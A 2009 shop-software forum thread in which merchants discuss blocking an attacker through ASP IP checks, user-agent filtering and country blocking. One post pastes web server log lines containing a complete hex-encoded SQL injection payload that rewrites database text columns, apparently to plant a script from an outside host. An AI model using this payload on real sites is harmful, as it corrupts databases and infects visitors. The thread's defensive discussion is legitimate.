Welcome, Guest ( Customer Panel | Login )




 All Forums
 VPCart Forum
 Add-ons for VP-ASP
 Help! Under attack! How to block users?
 New Topic  Reply to Topic
 Printer Friendly
Next Page
Author Previous Topic Topic Next Topic
Page: of 2

cijeho
Starting Member

13 Posts

Posted - July 09 2009 :  10:00:39  Show Profile  Reply with Quote
Hi - there is a user from the Philippines that has been hitting one of my tellafriend pages repeatedly for the past couple of hours. Nonstop. Is there a way to block a url from visiting my site? I have 4.5, am waiting for 7.0, and am a bit of a novice.

Edited by - cijeho on July 09 2009 15:01:45

THeVerve
VP-CART New User

117 Posts

Posted - July 09 2009 :  10:50:37  Show Profile  Reply with Quote
Do you know the IP address ofthe spammer ? If you do, you can try adding this modification to your shoptellafriend.asp

Open up shoptellafriend.asp using text editor and add this code. Replace "xxxx" with the Ip address of the spammer.

if request.servervariables("REMOTE_ADDR") = "xxxxxxx" then
shoperror "An error has occured. Please restart shopping."
end if

Add the code under the code "initializesystem" (around line 37 or so)

The code will not work though if they keep changing their ip address using proxy. Best way for this is probably to disable shoptellafriend.asp temporarily by renaming it to something else.
Go to Top of Page

cijeho
Starting Member

13 Posts

Posted - July 09 2009 :  12:01:17  Show Profile  Reply with Quote
Thank you. I don't have the initializesystem in that file. Sorry. I did change the shoptellafriend.asp name to something else, so they now get a 404. Unfortunately, that hasn't stopped them. Any other ideas?
Go to Top of Page

cijeho
Starting Member

13 Posts

Posted - July 09 2009 :  15:00:39  Show Profile  Reply with Quote
Help! This has been going on for 6 hours straight!
Go to Top of Page

support
Administrator

4679 Posts

Posted - July 09 2009 :  15:06:43  Show Profile  Visit support's Homepage  Reply with Quote
Hi there

You may want to post this our helpdesk if you cannot solve it from your end.

https://helpdesk.vpasp.com

Thanks

Cam
VPASP Support
Go to Top of Page

cijeho
Starting Member

13 Posts

Posted - July 09 2009 :  15:14:56  Show Profile  Reply with Quote
thanks, Cam, what if I don't know my order ID??
Go to Top of Page

support
Administrator

4679 Posts

Posted - July 09 2009 :  15:18:13  Show Profile  Visit support's Homepage  Reply with Quote
You should be able to see your order number at the bottom of your admin screen.

If it is not there then when you post a ticket add your ftp details in the secure section and our support guys can have a look for you.

When in the helpdesk registering select FREE as your version so you do not have to insert an order number if you cannot locate it.

Thanks
Cam

VPASP Support
Go to Top of Page

SQLDude
Starting Member

41 Posts

Posted - November 10 2009 :  02:54:29  Show Profile  Visit SQLDude's Homepage  Reply with Quote
I put this code in to prevent what looks like a SQL injection
attack, if that is what this is. Does anyone know how to determine the identity of the person who owns the IP Address and ...umm give him what ever or report him to the authorities or return the favor to them?

if request.servervariables("REMOTE_ADDR") = "93.158.148.30" then
shoperror "An error has occured. Please restart shopping."
end if

Yandex/1.01.001+(compatible;+Win16;+I) - 200 0 319 156 453
2009-11-09 12:57:44 W3SVC165 GET /shopexd.asp id=552&bc=no;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D4C45465428434F4E5645525428564152434841522834303030292C5B272B40432B275D292C504154494E444558282727253C7363722527272C434F4E5645525428564152434841522834303030292C5B272B40432B275D29292D312920574845524520504154494E444558282727253C7363722527272C434F4E5645525428564152434841522834303030292C5B272B40432B275D29293E302729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46672 1547 2953
2009-11-09 12:57:45 W3SVC165 GET /shopexd.asp id=552&bc=no;DeclArE%20@S%20VArChaR(4000);sEt%20@S=CAst(0x6445636C415245204074207661526348417228323535292C406320766172434861722832353529204465636C417265205461624C455F635572736F5220635552534F5220666F722053656C45637420412E6E414D452C422E4E416D652066724F4D207379736F626A6543547320412C735973436F4C754D6E73204220576865724520412E69643D622E496420614E4420612E58747950453D27752720414E642028422E58745970653D3939204F5220622E58747950453D3335204F7220422E58747950653D323331206F7220622E58747950453D31363729206F50456E205461624C655F635552734F72204665746348206E6578542066724F6D205441426C655F637572736F7220696E546F2040742C4063207768694C6528404046457463485F5374617455733D302920424567696E20657845432827555064615465205B272B40542B275D20536574205B272B40432B275D3D725452694D28634F4E7645527428564172634841722834303030292C5B272B40632B275D29292B634173542830583343373336333732363937303734323037333732363333443638373437343730334132463246373737373737324536413733373036463732373436313643324537323735324637303631363736353245364137333345334332463733363337323639373037343345204153205641724348415228353329292729204665746348206E6558742066526F6D207441624C655F437552734F7220694E746F2040742C406320656E6420636C6F5345207461626C655F437572736F52204465416C6C4F43615445205441626C455F637572736F5220%20as%20varcHAR(4000));exeC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46614 1573 703


This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
Go to Top of Page

devshb
Senior Member

United Kingdom
1904 Posts

Posted - November 10 2009 :  03:47:22  Show Profile  Visit devshb's Homepage  Reply with Quote
"report him to the authorities"

If you do that, I wish you the best of luck! Whenever I've tried to report hackers (even ones who were in the process of committing massive multi-million dollar credit card fraud and who I knew lots of info about), the authorities didn't want to know. Might be different in other countries, but here in the UK the authorities simply aren't interested in electronic fraud (at least that's what I've found, maybe others have had more luck)

I gave up reporting fraud/hackers in the end; everytime I reported it I was either ignored completely or told that I needed to have official proof of the actual physical theft before they'd even look at it. ie they'd only investigate if the person defrauded reported the crime; they wouldn't even consider situations where you knew what was going on but weren't personally the effected customer.

Simon Barnaby
Developer
[email protected]
www.BigYellowZone.com
Web Design, Online Marketing and VPASP addons

Edited by - devshb on November 10 2009 03:49:49
Go to Top of Page

SQLDude
Starting Member

41 Posts

Posted - November 11 2009 :  10:08:09  Show Profile  Visit SQLDude's Homepage  Reply with Quote
The subtle sub-rosa intent was to inform others to search for a User_Agent which contains "Yandex" in order to block all breach attempts from persons with accounts at:

http://www.Yandex.ru

The user_agent setting has the telltale browser setting from that website as an ISP even though the person spoofs random IP addresses. I have some ASP code which does a quick reverse DNS lookup to source the country of origin if they use their correct IP Address. If you never sell into Russia, Iran, Afghanistan or Iraq then you might want to block all IPs from those countries.

I will post the download area for this code in a few hours if anyone is interested. It uses an Access Database.


This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
Go to Top of Page

SQLDude
Starting Member

41 Posts

Posted - November 11 2009 :  10:43:29  Show Profile  Visit SQLDude's Homepage  Reply with Quote
Here is the IP to Country translation URL for testing purposes:

http://designerstyles.biz/ip/ipcountry.asp

This can not only be used to block certain countries which are known hacker havens, but also to provide a first line of defense
against possible credit card fraud. If the country where the IP Address originates from does not match the Country on the Credit Card, you can expend additional validation time to convince yourself whether or not the Credit Card is perhaps being used by a credit card fraud expert.

I will add this as a product item on my website later today.

eMail me if you are interested: [email protected]



This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
Go to Top of Page

janetvelasquez80l
Starting Member

1 Posts

Posted - November 13 2009 :  10:24:50  Show Profile  Reply with Quote
Have you tried blocking its IP?

[url=http://www.hubschrauber-selber-fliegen.eu]Hubschrauber selber fliegen[/url]

[url=http://www.hubschrauber-selber-fliegen.eu]Hubschrauber selber fliegen[/url]
Go to Top of Page

SQLDude
Starting Member

41 Posts

Posted - November 13 2009 :  14:07:43  Show Profile  Visit SQLDude's Homepage  Reply with Quote
This hacker using Yandex as the ISP is so sophisticated that he can spoof normal US IP Addresses and change it every time. The one thing he can't change is the embedded reference to "Yandex" in his User Agent settings, so that is what I search for and then block out based on that setting. You have to counter the sophisticated hacker attacks with appropriate counter-measures. Since I can not ship out of the USA without many complex tariff and customs written documentation I may just block out all non-USA IP addresses using the list of 60,000 rules
for assigned IP ranges found in my IP to Country conversion routines.

http://designerstyles.biz/ip/ipcountry.asp

I plan to convert this into a mini-product which will sell for $79.00 if anyone is interested.

This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
Go to Top of Page

highbanks
Starting Member

2 Posts

Posted - November 23 2009 :  20:19:04  Show Profile  Reply with Quote
back to the original question, i too have see alot of shoptellafriend.asp possible attacks. What is the issue with that file? and is it fixed in ver 6.5. I am doing an upgrade now.
Go to Top of Page

highbanks
Starting Member

2 Posts

Posted - November 23 2009 :  20:20:16  Show Profile  Reply with Quote
oh, forgot.. does 6.5 have the ability to block certain countries?
Go to Top of Page

SQLDude
Starting Member

41 Posts

Posted - November 23 2009 :  20:39:51  Show Profile  Visit SQLDude's Homepage  Reply with Quote
All better now. Cam and company added a Captcha feature which makes it impossible for a remote robot submission to succeed. You have to view and enter a 100% match to the 5-10 jumbled and obfuscated characters before doing a submit. And they also added a clearchars feature which strips out most if not all of the SQL injection attacks like the one I posted above.

The more I have to dig into the original source code for the enhancements I did for both the Google Checkout processing and for Bing Cash Back processing written mostly by Howard Kadetz and then modified by Cam and Company, the more impressed I am with what they have accomplished. My hat is off to you, Howard and Cam. Howard you are one of the true pioneers in the field of ASP Shopping Cart software written with a truly generic but very sophisticated approach which allows the SAME CODEBASE to work for Access, MySQL or SQL Server while still accommodating features from Chili Soft to allow systems to run on Linux or Windows. And the number of International Gateways you guys have to support is amazing, just amazing.

I am sure it was a 10-year labor of love for Howard, but at the same time it must have been very, very frustrating to make sure that every line of code would work under each and every combination and permutation of operating systems, database back-ends and gateways.

But enough about Howard and Cam, let's talk about me. I have been told by both Google Checkout management and Bing Cashback personnel that I am the first person they ever heard of who has enabled BOTH integrated systems and all the features in a 100% integrated fashion without dropping a cookie, trashing a session, or missing a byte or losing an order number, an order item or losing a persisted Bing Session Variable even while making multiple round trips to the remote Google hosted servers.

Then when I told them that I did the whole thing with FULL cookie and session integration in less than 18 days flat they were even more impressed. I have purchased several domains like ShopBingCarts.com, Googlized.net and Bingified.com, or whatever, and will be launching marketing campaigns after the holiday selling seasons. Delusions of Grandeur you say? Could be, but it ain't bragging if you can do it.

If you have a domestic USA shopping cart and are interested drop me an email and I can walk you through my web site as soon as it is 100% certified
by Bing Cash Back and it is launched. Target date is the first few days in December. Bing also has a pilot for Bing Search Shopping which I hope to be selected for as well.

John, the SQL Dude [email protected]









This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
Go to Top of Page
Page: of 2
Previous Topic Topic Next Topic  
Next Page
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000
0 Item(s)
$0.00